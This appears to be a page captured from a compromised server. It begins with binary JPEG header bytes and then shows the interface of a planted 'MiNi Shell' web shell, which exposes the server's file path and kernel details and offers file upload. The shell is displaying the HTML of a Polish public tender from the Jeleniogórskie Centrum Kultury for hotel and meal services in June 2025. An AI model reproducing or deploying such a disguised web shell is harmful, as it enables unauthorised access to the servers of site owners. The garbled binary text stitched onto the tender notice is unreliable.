JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250515/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250515/0023358801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług hotelarskich i wyżywienia dla Jeleniogórskiego Centrum Kultury w Jeleniej Górze w okresie od 09.06.2025 r. do 22.06.2025 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Jeleniogórskie Centrum Kultury</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 389199023</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">1 Maja, 60</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jelenia Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 75 64 23 880</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">jck@jck.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.jck.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług hotelarskich i wyżywienia dla Jeleniogórskiego Centrum Kultury w Jeleniej Górze w okresie od 09.06.2025 r. do 22.06.2025 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-47606e36-32a8-45cf-bf14-30e85d76df5c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00233588</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00209780/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Świadczenie usług hotelarskich i wyżywienia (ok. 56 noclegów ze śniad. i ok. 322 posiłków) dla uczestników projektu „Przyszłość Kultury: europejska, kolorowa i dla wszystkich!” w okresie 9-22.06.25</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt „Przyszłość Kultury: europejska, kolorowa i dla wszystkich!” jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Współpracy INTERREG Polska Saksonia 2021-2027 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-47606e36-32a8-45cf-bf14-30e85d76df5c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl/pl/.<br/>24.2 Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>24.3 W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: jck@jck.pl<br/>(UWAGA: nie dopuszcza się składania ofert za pośrednictwem poczty elektronicznej).<br/>Szczegóły zawiera TOM I SWZ Dział 24</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu, z<br/>wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce<br/>„Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności<br/>przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również<br/>dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). W przypadkach uniemożliwiających komunikację za<br/>pośrednictwem Platformy e-Zamówienia, dopuszczalna jest komunikacja za pomocą poczty elektronicznej na adres e-mail:<br/>jck@jck.pl Uwaga: W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w<br/>sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym, mogą być opatrzone, zgodnie z wyborem Wykonawcy/Wykonawcy wspólnie ubiegającego się o udzielenie<br/>zamówienia/podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego<br/>typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym<br/>plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>24.12 Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta<br/>„Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do<br/>komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia (w szczególności SWZ) wystarczające jest<br/>posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>24.13 Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>24.14 Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>24.15 W celu prawidłowego korzystania z usług Platformy e-Zamówienia wymagany jest:<br/>1) Komputer PC<br/>a) parametry minimum: Intel Core2 Duo, 2 GB RAM, HDD,<br/>b) zainstalowany jeden z poniższych systemów operacyjnych:<br/>• MS Windows 7 lub nowszy,<br/>• OSX/Mac OS 10.10,<br/>• Ubuntu 14.04,<br/>c) Zainstalowana jedna z poniższych przeglądarek:<br/>• Chrome 66.0 lub nowsza,<br/>• Firefox 59.0 lub nowszy,<br/>• Safari 11.1 lub nowsza,<br/>• Edge 14.0 i nowsze,<br/>albo<br/>2) Tablet/Telefon<br/>a) Parametry minimum: 4 rdzenie procesora, 2GB RAM, Android 6.0Marshmallow, iOS 10.3,<br/>b) Przeglądarka Chrome 61 lub nowa.<br/>24.16 Uwaga: Dla skorzystania z pełnej funkcjonalności może być konieczne włączenie w przeglądarce obsługi protokołu<br/>bezpiecznej transmisji danych SSL, obsługi Java Script, oraz cookies. Uwaga: Specyfikacja połączenia, formatu przesyłanych<br/>danych oraz kodowania i oznaczania czasu odbioru danych:2) format danych oraz kodowanie: formularze dostępne są w formacie HTML z kodowaniem UTF-8,<br/>3) oznaczenia czasu odbioru danych: wszelkie operacje opierają się o czas serwera i dane zapisywane są z dokładnością co do<br/>sekundy.<br/>Uwaga: Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy<br/>mogąskorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez<br/>formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl/pl/ w zakładce „Zgłoś problem”.<br/>Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w niniejszym SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający realizuje obowiązek informacyjny, o którym mowa w art. 13 ust. 1 i 3 RODO, w dokumentach zamówienia (Dział 27 Tomu I Specyfikacji Warunków Zamówienia - instrukcja dla Wykonawców).</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający realizuje obowiązek informacyjny, o którym mowa w art. 19 ust. 4 RODO, w dokumentach zamówienia (Dział 27 Tomu I Specyfikacji Warunków Zamówienia - instrukcja dla Wykonawców).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">JCK/ZP/4/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1	Przedmiotem postępowania i zamówienia jest wyłonienie Wykonawcy w zakresie świadczenia usługi hotelarskiej i gastronomicznej w Jeleniej Górze, dla uczestników warsztatów Reintegracje, organizowanych przez Jeleniogórskie Centrum Kultury. Warsztaty realizowane są w ramach projektu „Przyszłość Kultury: europejska, kolorowa i dla wszystkich!”, dofinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Współpracy INTERREG Polska Saksonia 2021-2027. <br/>4.2	Zamówienie zostało podzielone przez Zamawiającego na dwie Części:<br/>4.2.1	Część I zamówienia obejmuje zakwaterowanie wraz ze śniadaniem dla uczestników warsztatów pn.: Reintegracje, w dniach od 9 do 22 czerwca 2025 r. Wykonawca zobowiązany jest do zapewnienia co najmniej 80 osobodni w podanym terminie.<br/>4.2.2	Dodatkowe wymagania dotyczące Części I zamówienia: <br/>1)	Lokalizacja: Obiekt zakwaterowania powinien znajdować się w Jeleniej Górze, w odległości maksymalnie 2000 metrów od miejsca warsztatów, tj. od ul. Bankowej 28/30 w Jeleniej Górze - aby zapewnić szybki dostęp do miejsca realizacji warsztatów.<br/>2)	Wyżywienie: Śniadanie powinno być serwowane codziennie w formie bufetu lub zestawu śniadaniowego. Śniadanie kontynentalne w formie stołu szwedzkiego, obejmujące dania ciepłe (np. jajka, kiełbaski), wędlinę, ser, płatki z mlekiem, nabiał, warzywa, zimne napoje (woda i soki), ciepłe napoje (kawa, herbata plus cukier, cytryna, mleko) dla każdej z nocujących osób.<br/>3)	Śniadania musi być podawane w tym samym budynku, w którym realizowany jest nocleg - bez wychodzenia na zewnątrz budynku.<br/>4)	Przy miejscu noclegu musi być zlokalizowany bezpłatny parking dla uczestników warsztatów na co najmniej 3 samochody osobowe.<br/>5)	Pokoje powinny być udostępnione najpóźniej o godzinie 15.00 w dniu przyjazdu i opuszczone najpóźniej o godzinie 11.00 w dniu wyjazdu.<br/>6)	W trakcie realizacji zamówienia w obiekcie nie mogą być prowadzone żadne remonty lub podobne prace, z wyłączeniem zdarzeń losowych i awarii, które wymagają natychmiastowego usunięcia.<br/>7)	W godzinach nocnych od godz. 22.00 do godz. 6.00 zapewniony zostanie wypoczynek dla uczestników warsztatów, niezakłócony hałasami i odbywającymi się imprezami, spotkaniami towarzyskimi np. wesela itp.<br/>8)	Pokoje (minimalne wymagania): powinny być wyposażone w łazienki, dostęp do Internetu oraz podstawowe udogodnienia (ręczniki, pościel, środki higieniczne).<br/><br/>4.3	Wykonawca musi zaoferować przedmiot zamówienia zgodny z wymogami zamawiającego, określonymi w SWZ i załącznikach do niej.<br/>4.4	Informacja dotycząca wymagań, o których mowa w art. 95 ust. 1 ustawy Pzp, dotyczących zatrudniania przez Wykonawcę lub podwykonawcę na podstawie stosunku pracy osób wykonujących czynności w zakresie realizacji zamówienia, została ujęta w Dziale 26 Tomu I SWZ. <br/>Odległość mierzona będzie (w linii prostej według mapy internetowej https://www.google.pl/maps/) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55110000-4 - Hotelarskie usługi noclegowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55100000-1 - Usługi hotelarskie</p> <p class="mb-0">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</p> <p class="mb-0">55130000-0 - Inne usługi hotelarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-06-09 do 2025-06-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	CENA - waga 60% (60 punktów)<br/>2)	ODLEGŁOŚĆ obiektu od wskazanego miejsca - waga 20% (20 punktów)<br/>3)	MOŻLIWOŚCI DOSTOSOWANIA ZAMÓWIENIA - waga 20% (20 punktów)<br/><br/>Ad. 1) Punktacja za Kryterium I - CENA odbywać się będzie według wzoru <br/>(kryterium I dotyczy obu części zamówienia, przy czym każda z Części będzie odrębnie punktowana wg przypisanych jej kryteriom):<br/><br/>(Cmin. / Cb ) x 100 x 60 % = KI<br/>gdzie oznacza:<br/>KI - liczbę punktów z kryterium I<br/>Cmin. - najniższą cenę brutto z przedstawionych (niepodlegających odrzuceniu) ofert<br/>Cb - cenę brutto oferty badanej<br/>Maksymalna liczba punktów za kryterium I CENA - 60 punktów (KI)<br/><br/>Ad. 1.2) Punktacja za Kryterium II Odległość obiektu od wskazanego miejsca (1-2000 m) ul. Bankowej 28/30 w Jeleniej Górze <br/>UWAGA Dotyczy Części I zamówienia: <br/>1)	1-500 m: 20 punktów<br/>2)	501-1000 m: 15 punktów<br/>3)	1001-1500 m: 10 punktów<br/>4)	1501-1999 m: 5 punkty<br/>5)	2000 - 0 punktów <br/><br/>OPIS KRYTERIÓW:<br/>- odległość obiektu 1-500 m (20 punktów). Obiekty znajdujące się do 500 metrów w linii prostej od wskazanego miejsca otrzymują maksymalną liczbę punktów. <br/><br/>- odległość obiektu 501-1000 m (15 punktów). Obiekty znajdujące się od 501 do 1000 metrów w linii prostej otrzymują 15 punktów. <br/><br/>- odległość obiektu 1001-1500 m (10 punktów). Obiekty znajdujące się od 1001 do 1500 metrów w linii prostej otrzymują 10 punktów. <br/><br/>- odległość obiektu 1501-1999 m (5 punkty). Obiekty znajdujące się od 1501 do 1999 metrów w linii prostej otrzymują 5 punkty. <br/><br/>- odległość obiektu równa 2000 m (0 punktów). Obiekty znajdujące się w odległości 2000 metrów od wskazanego miejsca nie otrzymują punktów za odległość. <br/><br/>- Odległość maksymalnie 2000 metrów od wskazanego miejsca (ul. Bankowej 28/30 w Jeleniej Górze) jest kryterium wymaganym. Oferta, w której zaoferowany obiekt będzie znajdował się w odległości większej niż 2000 m, zostanie odrzucona.<br/><br/>Dokładność pomiaru: Odległość powinna być mierzona za pomocą Google Maps w linii prostej <br/>od ul. Bankowej 28/30 w Jeleniej Górze https://www.google.pl/maps/. <br/><br/>Odległość powinna być zaokrąglana do pełnych metrów zgodnie z zasadami matematycznymi: jeśli wartość po przecinku jest mniejsza niż 0,5, zaokrąglamy w dół (np. 2015,36 m zaokrąglamy do 2015 m). Jeśli wartość po przecinku jest równa lub większa niż 0,5, zaokrąglamy w górę (np. 2015,56 m zaokrąglamy do 2016 m).<br/><br/>Maksymalna liczba punktów za kryterium II Odległość miejsca noclegu od wskazanego miejsca - 20 punktów (KII)<br/><br/>Ad. 1.3) Punktacja za Kryterium III MOŻLIWOŚCI DOSTOSOWANIA ZAMÓWIENIA (dotyczy Części I zamówienia) <br/>W ramach tego kryterium Zamawiający przyzna punkty na podstawie informacji zawartej w Formularzu ofertowym, w następujący sposób:<br/>Skala ocen (przedziały punktowe)<br/>1.	Śniadanie dostosowane do indywidualnej diety:<br/>- 10 punktów: Możliwość dostosowania śniadania do dowolnej diety (np. wegetariańska, bezglutenowa, keto, wegańska).<br/>- 0 punktów: Brak możliwości dostosowania śniadania do indywidualnych diet.<br/>2.	Elastyczność godzin zameldowania i wymeldowania:<br/>- 10 punktów: Możliwość zameldowania i wymeldowania w elastycznych godzinach (np. późne wymeldowanie, wczesne zameldowanie).<br/>- 0 punktów: Brak elastyczności w godzinach zameldowania i wymeldowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">ODLEGŁOŚĆ obiektu od wskazanego miejsca</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">MOŻLIWOŚCI DOSTOSOWANIA ZAMÓWIENIA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1	Przedmiotem postępowania i zamówienia jest wyłonienie Wykonawcy w zakresie świadczenia usługi hotelarskiej i gastronomicznej w Jeleniej Górze, dla uczestników warsztatów Reintegracje, organizowanych przez Jeleniogórskie Centrum Kultury. Warsztaty realizowane są w ramach projektu „Przyszłość Kultury: europejska, kolorowa i dla wszystkich!”, dofinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Współpracy INTERREG Polska Saksonia 2021-2027. <br/>4.2	Zamówienie zostało podzielone przez Zamawiającego na dwie Części:<br/>4.2.1	Część II zamówienia obejmuje wyżywienie w formie obiadu zasiadanego dla uczestników warsztatów pn.: Reintegracje, w dniach od 9 do 21 czerwca 2025 r. oraz przygotowanie prowiantu na wyjazd dla uczestników warsztatów w dniu 22 czerwca 2025 r. (tzw. zestaw &#34;premium&#34;). <br/>4.2.2	Dodatkowe wymagania dotyczące Części II zamówienia:<br/>1)	Lokalizacja1: miejsce serwowania posiłków (obiadów) powinien znajdować się w Jeleniej Górze w odległości maksymalnie 500 metrów od miejsca warsztatów, tj. od ul. Bankowej 28/30 w Jeleniej Górze (aby zapewnić szybki dostęp do miejsca realizacji warsztatów).<br/>2)	Wyżywienie: posiłek w formie obiadu (w tym potrawy mięsne i vege). Łączna liczba posiłków w terminie od 9 - 21 czerwca 2025 r. (13 dni): 299 posiłków;<br/>3)	Ponadto Wykonawca, w ramach zamówienia, zobowiązany będzie do przygotowania na wyjazd w dniu 22 czerwca 2025 dla uczestników warsztatów <br/>prowiantu (tzw. zestaw &#34;lunchowego&#34;): dla 23 osób. <br/>4.3	Wykonawca musi zaoferować przedmiot zamówienia zgodny z wymogami zamawiającego, określonymi w SWZ i załącznikach do niej.<br/>4.4	Informacja dotycząca wymagań, o których mowa w art. 95 ust. 1 ustawy Pzp, dotyczących zatrudniania przez Wykonawcę lub podwykonawcę na podstawie stosunku pracy osób 